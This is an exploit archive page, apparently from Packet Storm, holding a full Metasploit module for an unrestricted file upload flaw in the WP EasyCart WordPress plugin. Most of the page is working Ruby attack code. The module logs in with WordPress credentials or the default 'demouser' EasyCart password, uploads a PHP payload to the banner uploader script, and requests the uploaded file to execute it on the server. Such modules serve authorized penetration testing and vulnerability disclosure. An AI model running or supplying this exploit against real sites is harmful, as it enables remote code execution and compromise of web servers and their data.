what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress WP EasyCart Unrestricted File Upload

WordPress WP EasyCart Unrestricted File Upload
Posted Feb 9, 2015
Authored by Kacper Szurek | Site metasploit.com

WordPress Shopping Cart (WP EasyCart) Plugin for WordPress contains a flaw that allows a remote attacker to execute arbitrary PHP code. This flaw exists because the /inc/amfphp/administration/banneruploaderscript.php script does not properly verify or sanitize user-uploaded files. By uploading a .php file, the remote system will place the file in a user-accessible path. Making a direct request to the uploaded file will allow the attacker to execute the script with the privileges of the web server. In versions 3.0.8 and below authentication can be done by using the WordPress credentials of a user with any role. In later versions, a valid EasyCart admin password will be required that is in use by any admin user. A default installation of EasyCart will setup a user called "demouser" with a preset password

tags | exploit, remote, web, arbitrary, php
SHA-256 | 0495c750468ab31d70256f4e711a288852e5ea85871a98e83de8ce2b6b4ee15d

WordPress WP EasyCart Unrestricted File Upload

Change Mirror Download
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::FileDropper
include Msf::HTTP::Wordpress

def initialize(info = {})
super(update_info(
info,
'Name' => 'WordPress WP EasyCart Unrestricted File Upload',
'Description' => %q{WordPress Shopping Cart (WP EasyCart) Plugin for
WordPress contains a flaw that allows a remote
attacker to execute arbitrary PHP code. This
flaw exists because the
/inc/amfphp/administration/banneruploaderscript.php
script does not properly verify or sanitize
user-uploaded files. By uploading a .php file,
the remote system will place the file in a
user-accessible path. Making a direct request to
the uploaded file will allow the attacker to
execute the script with the privileges of the web
server.

In versions <= 3.0.8 authentication can be done by
using the WordPress credentials of a user with any
role. In later versions, a valid EasyCart admin
password will be required that is in use by any
admin user. A default installation of EasyCart will
setup a user called "demouser" with a preset password
of "demouser".},
'License' => MSF_LICENSE,
'Author' =>
[
'Kacper Szurek', # Vulnerability disclosure
'Rob Carr <rob[at]rastating.com>' # Metasploit module
],
'References' =>
[
['OSVDB', '116806'],
['WPVDB', '7745']
],
'DisclosureDate' => 'Jan 08 2015',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['wp-easycart', {}]],
'DefaultTarget' => 0
))

register_options(
[
OptString.new('USERNAME', [false, 'The WordPress username to authenticate with (versions <= 3.0.8)']),
OptString.new('PASSWORD', [false, 'The WordPress password to authenticate with (versions <= 3.0.8)']),
OptString.new('EC_PASSWORD', [false, 'The EasyCart password to authenticate with (versions <= 3.0.18)', 'demouser']),
OptBool.new('EC_PASSWORD_IS_HASH', [false, 'Indicates whether or not EC_PASSWORD is an MD5 hash', false])
], self.class)
end

def username
datastore['USERNAME']
end

def password
datastore['PASSWORD']
end

def ec_password
datastore['EC_PASSWORD']
end

def ec_password_is_hash
datastore['EC_PASSWORD_IS_HASH']
end

def use_wordpress_authentication
username.to_s != '' && password.to_s != ''
end

def use_ec_authentication
ec_password.to_s != ''
end

def req_id
if ec_password_is_hash
return ec_password
else
return Rex::Text.md5(ec_password)
end
end

def generate_mime_message(payload, date_hash, name, include_req_id)
data = Rex::MIME::Message.new
data.add_part(date_hash, nil, nil, 'form-data; name="datemd5"')
data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#{name}\"")
data.add_part(req_id, nil, nil, 'form-data; name="reqID"') if include_req_id
data
end

def setup
if !use_wordpress_authentication && !use_ec_authentication
fail_with(Failure::BadConfig, 'You must set either the USERNAME and PASSWORD options or specify an EC_PASSWORD value')
end

super
end

def exploit
vprint_status("#{peer} - WordPress authentication attack is enabled") if use_wordpress_authentication
vprint_status("#{peer} - EC authentication attack is enabled") if use_ec_authentication

if use_wordpress_authentication && use_ec_authentication
print_status("#{peer} - Both EasyCart and WordPress credentials were supplied, attempting WordPress first...")
end

if use_wordpress_authentication
print_status("#{peer} - Authenticating using #{username}:#{password}...")
cookie = wordpress_login(username, password)

if !cookie
if use_ec_authentication
print_warning("#{peer} - Failed to authenticate with WordPress, attempting upload with EC password next...")
else
fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress')
end
else
print_good("#{peer} - Authenticated with WordPress")
end
end

print_status("#{peer} - Preparing payload...")
payload_name = Rex::Text.rand_text_alpha(10)
date_hash = Rex::Text.md5(Time.now.to_s)
uploaded_filename = "#{payload_name}_#{date_hash}.php"
plugin_url = normalize_uri(wordpress_url_plugins, 'wp-easycart')
uploader_url = normalize_uri(plugin_url, 'inc', 'amfphp', 'administration', 'banneruploaderscript.php')
payload_url = normalize_uri(plugin_url, 'products', 'banners', uploaded_filename)
data = generate_mime_message(payload, date_hash, "#{payload_name}.php", use_ec_authentication)

print_status("#{peer} - Uploading payload to #{payload_url}")
res = send_request_cgi(
'method' => 'POST',
'uri' => uploader_url,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s,
'cookie' => cookie
)

fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
vprint_error("#{peer} - Server responded with status code #{res.code}") if res.code != 200

print_status("#{peer} - Executing the payload...")
register_files_for_cleanup(uploaded_filename)
res = send_request_cgi(
{
'uri' => payload_url,
'method' => 'GET'
}, 5)

if !res.nil? && res.code == 404
print_error("#{peer} - Failed to upload the payload")
else
print_good("#{peer} - Executed payload")
end
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close